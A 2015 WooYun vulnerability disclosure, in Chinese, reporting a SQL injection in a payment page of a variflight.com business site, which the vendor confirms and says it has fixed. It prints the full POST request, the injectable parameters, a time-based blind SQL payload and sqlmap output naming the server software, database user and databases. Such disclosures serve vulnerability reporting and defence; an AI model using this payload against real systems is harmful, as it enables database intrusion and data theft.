当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125319

漏洞标题:飞友科技某重要站点SQL注射

相关厂商:variflight.com

漏洞作者: 路人甲

提交时间:2015-07-08 11:03

修复时间:2015-08-22 13:40

公开时间:2015-08-22 13:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向核心白帽子及相关领域专家公开
2015-07-28: 细节向普通白帽子公开
2015-08-07: 细节向实习白帽子公开
2015-08-22: 细节向公众公开

简要描述:

详细说明:

登陆以后自动跳转到个人中心,co-biz.variflight.com
POST /product/js_asp_gb/alipayto.asp HTTP/1.1
Content-Length: 320
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: co-biz.variflight.com/product/
Cookie: 
Host: co-biz.variflight.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
productcode=pF21ib5cnp&Submit2=%a8%a8%a3%a4%3f%a1%ec%3f%3f%a1%c0%7c3%3f%3f%a1%e8%3f%3f%3f%3f&v_amount=e&v_moneytype=1&v_oid=20526500201507070062&v_rcvaddr=e&v_rcvname=1&v_rcvtel=e&v_ymd=e
参数productcode和v_rcvname(直接sqlmap这个参数是跑不出来的),
还有,在访问某些页面的时候,productcode这个参数在cookie里面,但是不管在哪,都存在注入。

漏洞证明:

---
Parameter: productcode (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: productcode=pF21ib5cnp' OR (SELECT * FROM (SELECT(SLEEP(5)))ddzE) AND 'DWif'='DWif&Submit2=%a8%a8%a3%a4?%a1%ec??%a1%c0|3??%a1%e8????&v_amount=e&v_moneytype=1&v_oid=20526500201507070062&v_rcvaddr=e&v_rcvname=1&v_rcvtel=e&v_ymd=e
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0.12
current user:    'variflight@192.168.%'
current user is DBA:    False
available databases [3]:
[*] information_schema
[*] test
[*] var

修复方案:

修复!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-08 13:39

厂商回复:

已经对问题进行修复,感谢白帽子的努力,还请大家多多对我们进行测试。

最新状态:

暂无